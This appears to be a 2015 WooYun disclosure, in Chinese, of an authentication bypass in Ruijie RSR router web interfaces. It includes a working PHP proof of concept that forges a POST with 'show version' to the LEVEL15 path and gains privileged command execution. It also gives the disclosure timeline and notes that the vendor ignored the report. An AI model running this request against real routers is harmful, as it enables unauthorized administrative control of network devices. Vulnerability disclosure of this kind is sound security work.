当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151886

漏洞标题:通过伪造POST数据包可绕过锐捷RSR路由器web认证

相关厂商:ruijie.com.cn

漏洞作者: 五角

提交时间:2015-11-04 22:17

修复时间:2016-02-07 22:20

公开时间:2016-02-07 22:20

漏洞类型:权限控制绕过

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-03: 细节向核心白帽子及相关领域专家公开
2016-01-13: 细节向普通白帽子公开
2016-01-23: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

在看锐捷RSR的web登陆界面时发现登陆时以POST发送show version等信息至交换机
遂在PHP下伪装一个POST包发送 结果返回拥有LEVEL15权限的web操作界面

详细说明:

~BKSQJB{[ZO5]JYGBJ~J11T.jpg


这是登陆时发送的数据包

include "Snoopy.class.php";
$snoopy = new Snoopy;
$LoginURL = "http://192.168.130.13/WEB_VMS/LEVEL15/";
$snoopy->agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36';
$snoopy->referer = "http://192.168.130.13/index.htm";
$Data="command=show version&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.";
$snoopy->submit_text($LoginURL,$Data);
var_dump((string)$snoopy->results);


这是测试的代码 如果在这里发送show run等会提示没有权限 但是发送show version后会返回一个页面

1(8{T7UEYXB_Z9}I}9]AB3V.jpg


这里可以用LEVEL15权限执行命令

漏洞证明:

B{VCJHHLHLDC{JMR%~UJO)C.jpg


执行show run的结果
由于这套网络系统是近期由网络公司安装的 由此推断目前市面上大部分RSR路由有这个漏洞

修复方案:

。。。加个包的检测 对于用户而言。。web关了吧

版权声明:转载请注明来源 五角@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-07 22:20

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无